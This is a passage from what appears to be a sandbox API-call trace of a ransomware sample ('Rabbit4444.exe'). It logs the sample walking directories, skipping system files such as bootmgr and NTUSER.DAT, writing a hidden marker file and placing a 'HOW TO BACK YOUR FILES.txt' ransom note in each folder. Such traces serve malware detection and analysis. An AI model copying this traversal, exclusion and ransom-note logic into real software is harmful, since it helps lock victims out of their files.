(in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924aecaf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0061.463] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0061.463] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0061.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x123828 [0061.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122248 [0061.463] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0061.464] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0061.464] lstrcpyW (in: lpString1=0x130ebe6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0061.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x108688 [0061.464] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122308 [0061.464] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0061.464] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0061.464] lstrcpyW (in: lpString1=0x130ebe6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0061.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0061.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116930 [0061.464] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1220a8 [0061.464] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92488a4a, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0061.464] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.465] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.465] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.465] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.465] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.466] CloseHandle (hObject=0x2a0) returned 1 [0061.466] CloseHandle (hObject=0x27c) returned 1 [0061.466] GetCurrentThreadId () returned 0xd98 [0061.466] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0061.466] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState" [0061.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0061.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0061.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState" [0061.466] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\" [0061.466] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0061.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.469] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.471] FlushFileBuffers (hFile=0x27c) returned 1 [0061.472] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.472] CloseHandle (hObject=0x27c) returned 1 [0061.472] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState") returned 96 [0061.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf52919, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.473] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.473] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.473] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.473] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf52919, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.473] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.473] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.473] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.473] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.473] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf52919, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf52919, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf78bc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.473] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf52919, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf52919, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf78bc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.473] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.473] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.473] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.477] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.477] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.478] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.478] CloseHandle (hObject=0x2a0) returned 1 [0061.478] CloseHandle (hObject=0x27c) returned 1 [0061.478] GetCurrentThreadId () returned 0xd98 [0061.478] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0061.478] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData" [0061.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0061.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData" [0061.478] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\" [0061.478] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0061.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.481] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.598] FlushFileBuffers (hFile=0x27c) returned 1 [0061.867] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.867] CloseHandle (hObject=0x27c) returned 1 [0061.868] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData") returned 100 [0061.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.868] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf78bc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.868] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.868] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.868] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedf78bc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.868] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.868] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.868] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.868] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.868] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf78bc6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf78bc6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.868] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.868] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.869] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf78bc6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf78bc6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.869] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.869] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.869] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.870] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.870] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.870] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.870] CloseHandle (hObject=0x2a0) returned 1 [0061.871] CloseHandle (hObject=0x27c) returned 1 [0061.871] GetCurrentThreadId () returned 0xd98 [0061.871] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0061.871] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings" [0061.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0061.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0061.871] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings" [0061.871] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\" [0061.871] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0061.871] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, 